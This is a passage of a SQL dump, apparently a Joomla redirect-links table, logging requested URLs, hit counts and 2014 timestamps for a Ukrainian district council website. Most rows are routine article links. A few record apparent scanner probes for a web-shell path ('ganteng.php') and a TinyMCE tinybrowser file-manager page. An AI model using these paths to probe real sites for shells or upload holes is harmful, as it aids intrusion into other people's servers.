00:00:00',301),(8218,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-14052014-&catid=59:--20062014-&Itemid=107&lang=uk','','','',3,0,'2014-10-14 00:34:45','0000-00-00 00:00:00',301),(8219,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1083:-2014-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 00:41:09','0000-00-00 00:00:00',301),(8220,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=53&Itemid=94&lang=uk','','','',2,0,'2014-10-14 00:59:05','0000-00-00 00:00:00',301),(8221,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-14052014-&catid=59:--20062014-&Itemid=107&lang=ru','','','',4,0,'2014-10-14 01:04:19','0000-00-00 00:00:00',301),(8222,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-14052014-&catid=59&Itemid=107&lang=ru','','','',4,0,'2014-10-14 01:04:56','0000-00-00 00:00:00',301),(8223,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1241:2014-03-17-07-05-06&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-14 01:08:41','0000-00-00 00:00:00',301),(8224,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=51:--19072013-&Itemid=92&lang=en','','','',1,0,'2014-10-14 01:20:20','0000-00-00 00:00:00',301),(8225,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=53&Itemid=94&lang=ru','','','',2,0,'2014-10-14 01:58:20','0000-00-00 00:00:00',301),(8226,'http://www.malyn-rayrada.org.ua/components/ganteng.php?iulkk','','','',5,0,'2014-10-14 01:58:49','0000-00-00 00:00:00',301),(8227,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-----------------14052014-&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-10-14 02:37:37','0000-00-00 00:00:00',301),(8228,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1062:2013-07-29-13-33-29&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-14 02:39:39','0000-00-00 00:00:00',301),(8229,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1248:2014-03-21-18-16-44&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 02:39:41','0000-00-00 00:00:00',301),(8230,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=57:--15042014-&Itemid=98&lang=uk','','','',5,0,'2014-10-14 02:43:41','0000-00-00 00:00:00',301),(8231,'http://malyn-rayrada.org.ua/plugins/system/captcha/captcha.php','','','',1,0,'2014-10-14 02:52:02','0000-00-00 00:00:00',301),(8232,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-----------------14052014-&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-10-14 02:53:08','0000-00-00 00:00:00',301),(8233,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=53:--25102013-&Itemid=94&lang=ru','','','',2,0,'2014-10-14 03:11:15','0000-00-00 00:00:00',301),(8234,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-10-14 03:39:29','0000-00-00 00:00:00',301),(8235,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1197:-l-r-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 03:45:27','0000-00-00 00:00:00',301),(8236,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&Itemid=14&lang=en','','','',8,0,'2014-10-14 04:25:17','0000-00-00 00:00:00',301),(8237,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:----20-----&catid=11&Itemid=14&lang=en','','','',3,0,'2014-10-14 04:52:54','0000-00-00 00:00:00',301),(8238,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-10-14 04:53:35','0000-00-00 00:00:00',301),(8239,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-14 04:59:29','0000-00-00 00:00:00',301),(8240,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-14 05:15:23','0000-00-00 00:00:00',301),(8241,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=en&Itemid=0','','','',6,0,'2014-10-14 05:43:55','0000-00-00 00:00:00',301),(8242,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=en&Itemid=','','','',7,0,'2014-10-14 05:44:04','0000-00-00 00:00:00',301),(8243,'http://www.malyn-rayrada.org.ua/index.php?Itemid=96&catid=55&id=1169:2014-01-08-07-30-47&lang=uk&option=com_content&view=article','','','',5,0,'2014-10-14 05:50:12','0000-00-00 00:00:00',301),(8244,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1250:2014-03-24-07-04-57&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-14 05:50:14','0000-00-00 00:00:00',301),(8245,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=57&Itemid=98&lang=uk','','','',5,0,'2014-10-14 06:06:46','0000-00-00 00:00:00',301),(8246,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=57&Itemid=98&lang=uk','','','',2,0,'2014-10-14 06:06:49','0000-00-00 00:00:00',301),(8247,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&Itemid=14&lang=ru','','','',11,0,'2014-10-14 06:06:59','0000-00-00 00:00:00',301),(8248,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=57&Itemid=98&lang=uk','','','',6,0,'2014-10-14 06:07:08','0000-00-00 00:00:00',301),(8249,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&catid=57&Itemid=98&lang=uk','','','',3,0,'2014-10-14 06:07:11','0000-00-00 00:00:00',301),(8250,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&Itemid=14&lang=ru','','','',66,0,'2014-10-14 06:08:48','0000-00-00 00:00:00',301),(8251,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-14 06:09:28','0000-00-00 00:00:00',301),(8252,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-14 06:09:31','0000-00-00 00:00:00',301),(8253,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&Itemid=14&lang=en','','','',5,0,'2014-10-14 06:09:45','0000-00-00 00:00:00',301),(8254,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=uk','','','',2,0,'2014-10-14 06:10:19','0000-00-00 00:00:00',301),(8255,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&lang=uk','','','',4,0,'2014-10-14 06:10:55','0000-00-00 00:00:00',301),(8256,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=uk','','','',1,0,'2014-10-14 06:11:19','0000-00-00 00:00:00',301),(8257,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&lang=uk','','','',3,0,'2014-10-14 06:11:56','0000-00-00 00:00:00',301),(8258,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&lang=uk','','','',3,0,'2014-10-14 06:12:04','0000-00-00 00:00:00',301),(8259,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&lang=uk','','','',3,0,'2014-10-14 06:12:07','0000-00-00 00:00:00',301),(8260,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&lang=uk','','','',3,0,'2014-10-14 06:12:12','0000-00-00 00:00:00',301),(8261,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&lang=uk','','','',1,0,'2014-10-14 06:12:17','0000-00-00 00:00:00',301),(8262,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&lang=uk','','','',1,0,'2014-10-14 06:12:21','0000-00-00 00:00:00',301),(8263,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&catid=56&Itemid=97&lang=en','','','',3,0,'2014-10-14 06:35:27','0000-00-00 00:00:00',301),(8264,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-14 06:36:04','0000-00-00 00:00:00',301),(8265,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-------2013--------i--2014--&catid=36&Itemid=70&lang=en','','','',7,0,'2014-10-14 06:38:32','0000-00-00 00:00:00',301),(8266,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&Itemid=14&lang=en','','','',7,0,'2014-10-14 06:44:45','0000-00-00 00:00:00',301),(8267,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-10-14 06:47:36','0000-00-00 00:00:00',301),(8268,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=ru','','','',4,0,'2014-10-14 06:52:05','0000-00-00 00:00:00',301),(8269,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-14 06:52:08','0000-00-00 00:00:00',301),(8270,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-14 07:07:09','0000-00-00 00:00:00',301),(8271,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=uk','','','',5,0,'2014-10-14 07:07:12','0000-00-00 00:00:00',301),(8272,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&catid=56:--03022014-&Itemid=97&lang=en','','','',3,0,'2014-10-14 07:07:19','0000-00-00 00:00:00',301),(8273,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47&Itemid=86&lang=en','','','',2,0,'2014-10-14 07:16:21','0000-00-00 00:00:00',301),(8274,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-10-14 07:18:22','0000-00-00 00:00:00',301),(8275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-14 07:20:22','0000-00-00 00:00:00',301),(8276,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1269:----3110&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-14 07:36:20','0000-00-00 00:00:00',301),(8277,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1266:2014-04-03-05-25-14&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-14 07:36:23','0000-00-00 00:00:00',301),(8278,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=uk&Itemid=','','','',6,0,'2014-10-14 07:53:20','0000-00-00 00:00:00',301),(8279,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-10-14 08:02:40','0000-00-00 00:00:00',301),(8280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-10-14 08:16:13','0000-00-00 00:00:00',301),(8281,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-14 08:19:42','0000-00-00 00:00:00',301),(8282,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=936:2013-02-21-09-43-43&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-14 08:26:25','0000-00-00 00:00:00',301),(8283,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=ru','','','',3,0,'2014-10-14 08:37:15','0000-00-00 00:00:00',301),(8284,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-14 08:44:44','0000-00-00 00:00:00',301),(8285,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=uk','','','',3,0,'2014-10-14 09:07:02','0000-00-00 00:00:00',301),(8286,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1320:-15-2010-12-l-r&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-14 09:10:50','0000-00-00 00:00:00',301),(8287,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1202:2014-01-31-07-45-54&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-14 09:10:56','0000-00-00 00:00:00',301),(8288,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=929:2013-02-21-09-11-26&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 09:11:00','0000-00-00 00:00:00',301),(8289,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-10-14 09:13:04','0000-00-00 00:00:00',301),(8290,'http://malyn-rayrada.org.ua/protect.php','','','',1,0,'2014-10-14 09:13:36','0000-00-00 00:00:00',301),(8291,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=53:--25102013-&Itemid=94&lang=ru','','','',6,0,'2014-10-14 09:14:38','0000-00-00 00:00:00',301),(8292,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-10-14 09:21:26','0000-00-00 00:00:00',301),(8293,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-10-14 09:36:45','0000-00-00 00:00:00',301),(8294,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-14 09:41:38','0000-00-00 00:00:00',301),(8295,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1287:2014-04-23-06-49-34&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',2,0,'2014-10-14 10:19:24','0000-00-00 00:00:00',301),(8296,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47&Itemid=86&lang=uk','','','',7,0,'2014-10-14 10:22:50','0000-00-00 00:00:00',301),(8297,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=911:2013-01-22-13-27-41&lang=ru&option=com_content&view=article','','','',5,0,'2014-10-14 10:27:09','0000-00-00 00:00:00',301),(8298,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47&Itemid=86&lang=ru','','','',3,0,'2014-10-14 10:30:22','0000-00-00 00:00:00',301),(8299,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=982:2013-04-03-11-58-18&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-14 10:31:44','0000-00-00 00:00:00',301),(8300,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=56&Itemid=97&lang=uk','','http://yandex.ua/clck/jsredir?from=yandex.ua%3Byandsearch%3Bweb%3B%3B&text=%D0%B7%D0%B2%D0%B5%D1%80%D0%BD%D0%B5%D0%BD%D0%BD%D1%8F%20%D0%B4%D0%B5%D0%BF','',6,0,'2014-10-14 11:13:19','0000-00-00 00:00:00',301),(8301,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1150:2013-11-28-14-53-17&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 11:33:49','0000-00-00 00:00:00',301),(8302,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47:-21022013-&Itemid=86&lang=uk','','','',2,0,'2014-10-14 11:44:13','0000-00-00 00:00:00',301),(8303,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&catid=10&Itemid=17&lang=en','','','',5,0,'2014-10-14 12:03:31','0000-00-00 00:00:00',301),(8304,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1282:-30-6-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-14 12:05:20','0000-00-00 00:00:00',301),(8305,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1186:-2013-i-2014-&lang=uk&option=com_content&view=article','','','',6,0,'2014-10-14 12:19:56','0000-00-00 00:00:00',301),(8306,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=15&id=1221:2014-02-22-08-09-27&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 12:20:02','0000-00-00 00:00:00',301),(8307,'http://malyn-rayrada.org.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/edit.php?type=file&folder=','','','',1,0,'2014-10-14 12:23:36','0000-00-00 00:00:00',301),(8308,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47:-21022013-&Itemid=86&lang=ru','','','',2,0,'2014-10-14 12:36:49','0000-00-00 00:00:00',301),(8309,'http://www.malyn-rayrada.org.ua/index.php?id=3&Itemid=7&lang=ru&layout=blog&option=com_content&view=category','','','',4,0,'2014-10-14 12:50:26','0000-00-00 00:00:00',301),(8310,'http://www.malyn-rayrada.org.ua/component/user/register','','','',7,0,'2014-10-14 12:52:31','0000-00-00 00:00:00',301),(8311,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47:--21022013-&Itemid=86&lang=ru','','','',2,0,'2014-10-14 12:52:37','0000-00-00 00:00:00',301),(8312,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',2,0,'2014-10-14 13:06:06','0000-00-00 00:00:00',301),(8313,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&catid=51:--19072013-&Itemid=92&lang=en','','','',3,0,'2014-10-14 13:17:29','0000-00-00 00:00:00',301),(8314,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-10-14 13:18:49','0000-00-00 00:00:00',301),(8315,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47:--21022013-&Itemid=86&lang=uk','','','',2,0,'2014-10-14 13:21:18','0000-00-00 00:00:00',301),(8316,'http://www.malyn-rayrada.org.ua/index.php?Itemid=96&catid=55&id=1168:2014-01-08-07-14-14&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-14 13:54:24','0000-00-00 00:00:00',301),(8317,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1000:1&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-14 13:54:26','0000-00-00 00:00:00',301),(8318,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-10-14 14:13:16','0000-00-00 00:00:00',301),(8319,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-10-14 14:13:44','0000-00-00 00:00:00',301),(8320,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=uk','','','',2,0,'2014-10-14 14:14:20','0000-00-00 00:00:00',301),(8321,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=uk','','','',3,0,'2014-10-14 14:15:12','0000-00-00 00:00:00',301),(8322,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-14 14:17:08','0000-00-00 00:00:00',301),(8323,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-10-14 14:56:38','0000-00-00 00:00:00',301),(8324,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1211:-2014-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 15:02:01','0000-00-00 00:00:00',301),(8325,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=969:-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 15:13:04','0000-00-00 00:00:00',301),(8326,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1084:-qq&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 15:13:06','0000-00-00 00:00:00',301),(8327,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=ru','','','',2,0,'2014-10-14 15:43:15','0000-00-00 00:00:00',301),(8328,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=ru','','','',3,0,'2014-10-14 15:46:04','0000-00-00 00:00:00',301),(8329,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=uk&Itemid=','','','',2,0,'2014-10-14 15:46:13','0000-00-00 00:00:00',301),(8330,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-10-14 16:13:28','0000-00-00 00:00:00',301),(8331,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=ru&Itemid=0','','','',3,0,'2014-10-14 16:14:34','0000-00-00 00:00:00',301),(8332,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=ru&Itemid=','','','',2,0,'2014-10-14 16:14:41','0000-00-00 00:00:00',301),(8333,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1182:2014-01-23-06-45-09&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-14 16:14:54','0000-00-00 00:00:00',301),(8334,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=ru&Itemid=0','','','',2,0,'2014-10-14 16:18:18','0000-00-00 00:00:00',301),(8335,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-14 16:30:28','0000-00-00 00:00:00',301),(8336,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1259:1&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 16:46:52','0000-00-00 00:00:00',301),(8337,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-14 17:00:53','0000-00-00 00:00:00',301),(8338,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1126:2013-10-31-12-52-35&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-14 17:01:04','0000-00-00 00:00:00',301),(8339,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=uk','','','',5,0,'2014-10-14 17:04:10','0000-00-00 00:00:00',301),(8340,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-10-14 17:08:10','0000-00-00 00:00:00',301),(8341,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-14 17:14:02','0000-00-00 00:00:00',301),(8342,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-10-14 17:16:05','0000-00-00 00:00:00',301),(8343,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',4,0,'2014-10-14 17:19:40','0000-00-00 00:00:00',301),(8344,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-14 17:22:42','0000-00-00 00:00:00',301),(8345,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=ru','','','',5,0,'2014-10-14 17:42:15','0000-00-00 00:00:00',301),(8346,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1123:-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-14 17:48:29','0000-00-00 00:00:00',301),(8347,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-14 17:51:15','0000-00-00 00:00:00',301),(8348,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-14 18:07:20','0000-00-00 00:00:00',301),(8349,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10&id=1260:2014-03-31-11-32-51&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-14 18:08:08','0000-00-00 00:00:00',301),(8350,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1153:-2013-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-14 18:08:12','0000-00-00 00:00:00',301),(8351,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:------------2010-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-10-14 18:30:46','0000-00-00 00:00:00',301),(8352,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-14 18:35:40','0000-00-00 00:00:00',301),(8353,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=964:-2013-2017-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-14 18:36:04','0000-00-00 00:00:00',301),(8354,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=uk','','','',4,0,'2014-10-14 18:48:10','0000-00-00 00:00:00',301),(8355,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=en','','','',4,0,'2014-10-14 18:48:33','0000-00-00 00:00:00',301),(8356,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-14 19:04:19','0000-00-00 00:00:00',301),(8357,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1001:2013-04-30-12-14-17&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-14 19:22:08','0000-00-00 00:00:00',301),(8358,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',5,0,'2014-10-14 19:25:25','0000-00-00 